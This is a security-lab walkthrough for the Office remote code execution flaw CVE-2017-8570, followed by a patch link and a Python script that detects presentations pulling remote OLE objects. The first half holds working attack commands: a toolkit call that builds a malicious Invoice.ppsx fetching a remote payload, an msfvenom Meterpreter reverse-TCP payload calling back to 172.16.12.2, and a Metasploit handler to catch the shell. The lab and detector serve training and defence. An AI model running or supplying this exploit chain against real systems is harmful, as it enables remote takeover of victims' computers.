- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
Office remote code execution vulnerability - online network security lab - i春秋 (ichunqiu.com)
1. Generate the ppsx file
cd CVE-2017-8570 // enter the exploit directory
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://172.16.12.2/logo.doc // generate the malicious ppsx file
2. Generate the reverse-shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=4444 -f exe > /tmp/shell.exe
3. Listen on the port
python cve-2017-8570_toolkit.py -M exp -e http://172.16.12.2/shell.exe -l /tmp/shell.exe
4. Listen locally in msf for the reverse connection
msfconsole
use multi/handler // use the handler module
set payload windows/meterpreter/reverse_tcp // set the payload
set LHOST 172.16.12.2 // set the local receiving IP
run
5. Open the ppsx file to obtain a shell.
Remediation:
Patch: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570
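
For triage of unpatched hosts, the following added example (not part of the original lab or the toolkit) flags presentation files that pull an OLE object from a remote location. It assumes the generated ppsx carries its -u URL as an externally targeted OLE-object relationship in the package; the sample files, the 192.0.2.10 address and the function names are constructed for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace of OPC relationship parts (*.rels) inside Office Open XML packages.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def build_sample(target, mode):
    """Constructed test input: a minimal ppsx-like zip with one slide relationship."""
    attr = f' TargetMode="{mode}"' if mode else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        f'Target="{target}"{attr}/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()

def external_ole_links(data):
    """Return (part, target) for every externally targeted OLE-object relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                # For untrusted attachments, parse with defusedxml instead.
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                # A relationships part that does not parse is itself worth a look.
                hits.append((name, "<unparseable relationships part>"))
                continue
            for rel in root.iter(REL_NS + "Relationship"):
                is_ole = rel.get("Type", "").lower().endswith("/oleobject")
                is_ext = rel.get("TargetMode", "").lower() == "external"
                if is_ole and is_ext:
                    hits.append((name, rel.get("Target", "")))
    return hits

if __name__ == "__main__":
    for label, sample in (("remote", build_sample("http://192.0.2.10/logo.doc", "External")),
                          ("embedded", build_sample("../embeddings/oleObject1.bin", ""))):
        print(label, external_ole_links(sample))
```

An embedded OLE object with no TargetMode attribute is not reported; only relationships that leave the package are.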